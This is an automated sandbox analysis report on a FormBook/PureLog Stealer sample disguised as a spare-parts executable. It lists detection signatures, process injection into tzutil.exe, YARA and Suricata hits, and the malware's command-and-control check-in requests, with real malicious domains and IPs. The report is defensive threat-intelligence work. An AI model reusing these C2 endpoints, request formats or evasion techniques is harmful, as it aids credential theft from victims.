Windows Analysis Report
XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe

Overview

General Information

Sample name: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe
Analysis ID: 1562208
MD5: 77f595058c6627bf075a7283b57e1c5d
SHA1: 2d62714bf2c62d2f09b13515b4e2aa7735477321
SHA256: 8ba1a789e4494fdc1f919352cb4d80f26ea73c3dd94f978c32cde476afceb34a
Tags: exe, Formbook, user-threatcat_ch

Detection

FormBook, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe (PID: 7424 cmdline: "C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe" MD5: 77F595058C6627BF075A7283B57E1C5D)
    • XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe (PID: 7648 cmdline: "C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe" MD5: 77F595058C6627BF075A7283B57E1C5D)
      • xAbOwtcTtZmjBX.exe (PID: 6884 cmdline: "C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • tzutil.exe (PID: 8056 cmdline: "C:\Windows\SysWOW64\tzutil.exe" MD5: 31DE852CCF7CED517CC79596C76126B4)
          • xAbOwtcTtZmjBX.exe (PID: 6784 cmdline: "C:\Program Files (x86)\ANsDTSeNonaranAlTWTJBxNqveGiUgHKsofZTNpMBSOaXyXAJCXyhhDyKURuYJNKTQAfCxLhtTQkawJ\xAbOwtcTtZmjBX.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6016 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000004.00000002.1938558348.0000000000FF0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000009.00000002.2603137890.0000000000F70000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000000.00000002.1391242614.0000000007480000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000004.00000002.1937882646.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000009.00000002.2601185842.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
0.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.7480000.3.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.401e790.2.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
4.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
4.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.7480000.3.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
                      No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-25T10:51:13.632871+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49874 | 161.97.142.144 | 80 | TCP
2024-11-25T10:51:39.964629+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49933 | 107.155.56.30 | 80 | TCP
2024-11-25T10:51:55.962213+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49972 | 13.228.81.39 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-25T10:51:13.632871+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.9 | 49874 | 161.97.142.144 | 80 | TCP
2024-11-25T10:51:39.964629+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.9 | 49933 | 107.155.56.30 | 80 | TCP
2024-11-25T10:51:55.962213+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.9 | 49972 | 13.228.81.39 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-25T10:51:31.821289+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 49913 | 107.155.56.30 | 80 | TCP
2024-11-25T10:51:34.477690+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 49921 | 107.155.56.30 | 80 | TCP
2024-11-25T10:51:37.258859+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 49927 | 107.155.56.30 | 80 | TCP
2024-11-25T10:51:47.868179+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 49953 | 13.228.81.39 | 80 | TCP
2024-11-25T10:51:50.524880+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 49959 | 13.228.81.39 | 80 | TCP
2024-11-25T10:51:53.180646+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.9 | 49966 | 13.228.81.39 | 80 | TCP

                      AV Detection

                      Source: http://www.taxiquynhonnew.click/y49d/?Ap=KZH8jfU0&BzI0pR=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMcDzO8C+ujqQcrInydaZ/WyC6o7IBrA== - Avira URL Cloud: Label: malware
                      Source: http://www.taxiquynhonnew.click/y49d/ - Avira URL Cloud: Label: malware
                      Source: https://www.taxiquynhonnew.click/y49d/?Ap=KZH8jfU0&BzI0pR=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXg - Avira URL Cloud: Label: malware
                      Source: Yara matchFile source: 4.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.1938558348.0000000000FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2603137890.0000000000F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1937882646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2601185842.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2603506691.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2602984671.0000000001060000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2603358231.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1939504326.00000000014B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Submitted Sample - Integrated Neural Analysis Model: Matched 100.0% probability
                      Source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe - Joe Sandbox ML: detected
                      Source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe - Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe - Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: tzutil.pdbGCTL source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe, 00000004.00000002.1938382420.0000000000CF8000.00000004.00000020.00020000.00000000.sdmp, xAbOwtcTtZmjBX.exe, 00000006.00000002.2602793009.0000000001368000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: xAbOwtcTtZmjBX.exe, 00000006.00000002.2601239645.000000000044E000.00000002.00000001.01000000.0000000C.sdmp, xAbOwtcTtZmjBX.exe, 0000000A.00000000.2012860631.000000000044E000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: wntdll.pdbUGP source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe, 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000009.00000003.1938178930.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000009.00000003.1940155540.00000000031AB000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe, XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe, 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, tzutil.exe, 00000009.00000002.2604107733.00000000034FE000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000009.00000003.1938178930.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000009.00000003.1940155540.00000000031AB000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000009.00000002.2604107733.0000000003360000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: mSVq.pdb source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe
                      Source: Binary string: mSVq.pdbSHA256 source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe
                      Source: Binary string: tzutil.pdb source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe, 00000004.00000002.1938382420.0000000000CF8000.00000004.00000020.00020000.00000000.sdmp, xAbOwtcTtZmjBX.exe, 00000006.00000002.2602793009.0000000001368000.00000004.00000020.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 9_2_00ABC9D0 FindFirstFileW,FindNextFileW,FindClose,9_2_00ABC9D0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 4x nop then xor eax, eax9_2_00AA9F80
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 4x nop then mov ebx, 00000004h9_2_031C04D0

                      Networking

                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49927 -> 107.155.56.30:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49966 -> 13.228.81.39:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49921 -> 107.155.56.30:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49913 -> 107.155.56.30:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49933 -> 107.155.56.30:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49933 -> 107.155.56.30:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49959 -> 13.228.81.39:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49972 -> 13.228.81.39:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49972 -> 13.228.81.39:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49874 -> 161.97.142.144:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49874 -> 161.97.142.144:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49953 -> 13.228.81.39:80
                      Source: DNS query: www.070001325.xyz
                      Source: Joe Sandbox View IP Address: 161.97.142.144
                      Source: Joe Sandbox View IP Address: 13.228.81.39
                      Source: Joe Sandbox View ASN Name: CONTABODE
                      Source: Joe Sandbox View ASN Name: UHGL-AS-APUCloudHKHoldingsGroupLimitedHK
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global traffic HTTP traffic detected: GET /gebt/?Ap=KZH8jfU0&BzI0pR=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edmwlqePdZlnBGcJVL9hTasAQSXzj69w== HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Host: www.070001325.xyz | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Source: global traffic HTTP traffic detected: GET /2gcl/?BzI0pR=1IksVaFM1cAemyK05p+hJvI89YFPTpbYdVbJCfEKBOY5tDFEgZGIVLfooGjxZE8Rq+UWfqPa15shq7PO0tNmdZelj0tsTwcFH17YLMDQdjUbN6i8hA==&Ap=KZH8jfU0 HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Host: www.expancz.top | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Source: global traffic HTTP traffic detected: GET /y49d/?Ap=KZH8jfU0&BzI0pR=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMcDzO8C+ujqQcrInydaZ/WyC6o7IBrA== HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Host: www.taxiquynhonnew.click | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Source: global trafficDNS traffic detected: DNS query: www.070001325.xyz
                      Source: global trafficDNS traffic detected: DNS query: www.expancz.top
                      Source: global trafficDNS traffic detected: DNS query: www.taxiquynhonnew.click
                      Source: global trafficDNS traffic detected: DNS query: www.epitomize.shop
                      Source: unknown HTTP traffic detected: POST /2gcl/ HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Accept-Encoding: gzip, deflate, br | Host: www.expancz.top | Origin: http://www.expancz.top | Connection: close | Content-Type: application/x-www-form-urlencoded | Content-Length: 195 | Cache-Control: max-age=0 | Referer: http://www.expancz.top/2gcl/ | User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 | Data Ascii: BzI0pR=4KMMWvJXtNIDx3KzsoqEZdth1vBXWqHUXTu9E+YPPeEpuAJIzLvsGbb+1xzxQVc8tMVkU8ba4IkF3MDc1tJoAuzZ6gENTRoiemeONY/pcTgIRfXriJT72uF0eHBSwvmxOwqvqp4aTYKynoMienfBG6MeY+cP4pkLTC1nfwqw+6JF1O0hsrSbm0bRl6xD
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 25 Nov 2024 09:51:13 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 2966 | Connection: close | Vary: Accept-Encoding | ETag: "66cce1df-b96"
                      Source: XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeString found in binary or memory: http://tempuri.org/DataSet1.xsd
                      Source: xAbOwtcTtZmjBX.exe, 0000000A.00000002.2602984671.00000000010B6000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.taxiquynhonnew.click
                      Source: xAbOwtcTtZmjBX.exe, 0000000A.00000002.2602984671.00000000010B6000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.taxiquynhonnew.click/y49d/
                      Source: tzutil.exe, 00000009.00000003.2135827447.0000000007DD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: tzutil.exe, 00000009.00000002.2607172305.00000000062E0000.00000004.00000800.00020000.00000000.sdmp, tzutil.exe, 00000009.00000002.2605003324.0000000003F06000.00000004.10000000.00040000.00000000.sdmp, xAbOwtcTtZmjBX.exe, 0000000A.00000002.2604213032.00000000033B6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://analytics.tiktok.com/i18n/pixel/events.js
                      Source: tzutil.exe, 00000009.00000003.2135827447.0000000007DD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: tzutil.exe, 00000009.00000003.2135827447.0000000007DD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: tzutil.exe, 00000009.00000003.2135827447.0000000007DD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: tzutil.exe, 00000009.00000002.2607172305.00000000062E0000.00000004.00000800.00020000.00000000.sdmp, tzutil.exe, 00000009.00000002.2605003324.0000000003F06000.00000004.10000000.00040000.00000000.sdmp, xAbOwtcTtZmjBX.exe, 0000000A.00000002.2604213032.00000000033B6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://connect.facebook.net/en_US/fbevents.js
                      Source: xAbOwtcTtZmjBX.exe, 0000000A.00000002.2604213032.00000000033B6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dq0ib5xlct7tw.cloudfront.net/
                      Source: tzutil.exe, 00000009.00000003.2135827447.0000000007DD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: tzutil.exe, 00000009.00000003.2135827447.0000000007DD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: tzutil.exe, 00000009.00000003.2135827447.0000000007DD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: tzutil.exe, 00000009.00000002.2607172305.00000000062E0000.00000004.00000800.00020000.00000000.sdmp, tzutil.exe, 00000009.00000002.2605003324.0000000003F06000.00000004.10000000.00040000.00000000.sdmp, xAbOwtcTtZmjBX.exe, 0000000A.00000002.2604213032.00000000033B6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://l3filejson4dvd.josyliving.com/favicon.ico
                      Source: tzutil.exe, 00000009.00000002.2601354359.0000000000B9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.7
                      Source: tzutil.exe, 00000009.00000002.2601354359.0000000000B9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                      Source: tzutil.exe, 00000009.00000002.2601354359.0000000000B9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                      Source: tzutil.exe, 00000009.00000003.2130647535.0000000007D04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                      Source: tzutil.exe, 00000009.00000002.2601354359.0000000000B9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                      Source: tzutil.exe, 00000009.00000002.2601354359.0000000000B9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                      Source: tzutil.exe, 00000009.00000002.2601354359.0000000000B9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                      Source: tzutil.exe, 00000009.00000002.2601354359.0000000000B9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                      Source: tzutil.exe, 00000009.00000002.2607172305.00000000062E0000.00000004.00000800.00020000.00000000.sdmp, tzutil.exe, 00000009.00000002.2605003324.0000000003F06000.00000004.10000000.00040000.00000000.sdmp, xAbOwtcTtZmjBX.exe, 0000000A.00000002.2604213032.00000000033B6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://s.yimg.com/wi/ytc.js
                      Source: tzutil.exe, 00000009.00000003.2135827447.0000000007DD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: tzutil.exe, 00000009.00000003.2135827447.0000000007DD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: tzutil.exe, 00000009.00000002.2607172305.00000000062E0000.00000004.00000800.00020000.00000000.sdmp, tzutil.exe, 00000009.00000002.2605003324.0000000003F06000.00000004.10000000.00040000.00000000.sdmp, xAbOwtcTtZmjBX.exe, 0000000A.00000002.2604213032.00000000033B6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=
                      Source: tzutil.exe, 00000009.00000002.2605003324.0000000004098000.00000004.10000000.00040000.00000000.sdmp, xAbOwtcTtZmjBX.exe, 0000000A.00000002.2604213032.0000000003548000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.taxiquynhonnew.click/y49d/?Ap=KZH8jfU0&BzI0pR=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXg

                      E-Banking Fraud

                      Source: Yara matchFile source: 4.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.1938558348.0000000000FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2603137890.0000000000F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1937882646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2601185842.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2603506691.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2602984671.0000000001060000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2603358231.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1939504326.00000000014B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Code function: 4_2_0042C953 NtClose,4_2_0042C953
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Code function: 4_2_011D2B60 NtClose,LdrInitializeThunk,4_2_011D2B60
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Code function: 4_2_011D2DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_011D2DF0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Code function: 4_2_011D2C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_011D2C70
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Code function: 4_2_011D35C0 NtCreateMutant,LdrInitializeThunk,4_2_011D35C0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Code function: 4_2_011D4340 NtSetContextThread,4_2_011D4340
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Code function: 4_2_011D4650 NtSuspendThread,4_2_011D4650
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Code function: 4_2_011D2B80 NtQueryInformationFile,4_2_011D2B80
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Code function: 4_2_011D2BA0 NtEnumerateValueKey,4_2_011D2BA0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Code function: 4_2_011D2BF0 NtAllocateVirtualMemory,4_2_011D2BF0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Code function: 4_2_011D2BE0 NtQueryValueKey,4_2_011D2BE0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Code function: 4_2_011D2AB0 NtWaitForSingleObject,4_2_011D2AB0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Code function: 4_2_011D2AD0 NtReadFile,4_2_011D2AD0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Code function: 4_2_011D2AF0 NtWriteFile,4_2_011D2AF0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Code function: 4_2_011D2D10 NtMapViewOfSection,4_2_011D2D10
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Code function: 4_2_011D2D00 NtSetInformationFile,4_2_011D2D00
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Code function: 4_2_011D2D30 NtUnmapViewOfSection,4_2_011D2D30
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe Code function: 4_2_011D2DB0 NtEnumerateKey,4_2_011D2DB0
